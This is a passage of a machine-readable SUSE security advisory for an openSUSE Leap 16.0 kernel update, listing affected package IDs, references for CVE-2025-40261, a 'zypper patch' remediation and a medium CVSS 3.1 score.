"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
